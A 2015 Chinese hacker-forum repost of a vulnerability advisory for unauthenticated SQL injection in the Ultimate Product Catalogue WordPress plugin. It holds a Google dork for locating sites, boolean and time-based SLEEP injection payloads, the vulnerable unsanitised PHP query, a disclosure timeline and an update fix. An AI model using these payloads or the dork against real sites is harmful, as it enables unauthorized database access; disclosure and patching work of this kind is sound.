搜索
查看: 491|回复: 0

ltimate Product Catalogue WordPress Plugin - SQL Injecton Vulnerabilities

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2015-4-29 22:36:17 | 显示全部楼层 |阅读模式
  1. # Exploit Title: Unauthenticated sqli on Ultimate Product Catalogue
  2. wordpress plugin
  3. # Google Dork: inurl:"SingleProduct" intext:"Back to catalogue"
  4. intext:"Category",
  5. inurl:"/wp-content/plugins/ultimate-product-catalogue/product-sheets/"
  6. # Date: 22/04/2015
  7. # Exploit Author: Felipe Molina de la Torre (@felmoltor)
  8. # Vendor Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/
  9. # Software Link:
  10. https://downloads.wordpress.org/plugin/ultimate-product-catalogue.3.1.2.zip
  11. # Version: < 3.1.2, Comunicated and Fixed by the Vendor in 3.1.3
  12. # Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turnedd off, Apache
  13. 2.4.0 (Ubuntu)
  14. # CVE : Requested to mitre but not assigned yet
  15. # Category: webapps

  16. 1. Summary:

  17.      Ultimate Product Catalogue is A responsive and easily customizable
  18. plugin for all your product catalogue needs. It has +59.000 downloads,
  19. +3.000 active installations.

  20. Unauthenticated SQL injection in parameter "SingleProduct" when a web
  21. visitor explores a product published by the web administrator

  22. 2. Vulnerability timeline:
  23. - 22/04/2015: Identified in version 3.1.2
  24. - 22/04/2015: Comunicated to developer company etoilewebdesign.com
  25. - 22/04/2015: Response from etoilewebdesign.com and fixed version in 3.1.3

  26. 3. Vulnerable code:

  27.     File Functions/Shortcodes.php line 779

  28.     Proof of concept

  29.     http://<wordpress site>/?SingleProduct=2'+and+'a'='a
  30.     http://<wordpress site>/?SingleProduct=2'+and+'a'='b

  31.     In file Functions/Process_Ajax.php line 67:
  32. [...]
  33. $Item_ID = $_POST['Item_ID'];
  34.         $Item = $wpdb->get_row("SELECT Item_Views FROM $items_table_name
  35. WHERE Item_ID=" . $Item_ID);
  36. [...]

  37.     Proof of concept:

  38.     POST /wp-admin/admin-ajax.php HTTP/1.1
  39.   Host: <wordpress host>
  40.   [...]
  41.   Cookie: wordpress_f305[...]

  42.   Item_ID=2 AND SLEEP(5)&action=record_view

  43. 4. Solution:

  44.     Update to version 3.1.3

  45.         #  1337day.com [2015-04-29]  #
复制代码
过段时间可能会取消签到功能了
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表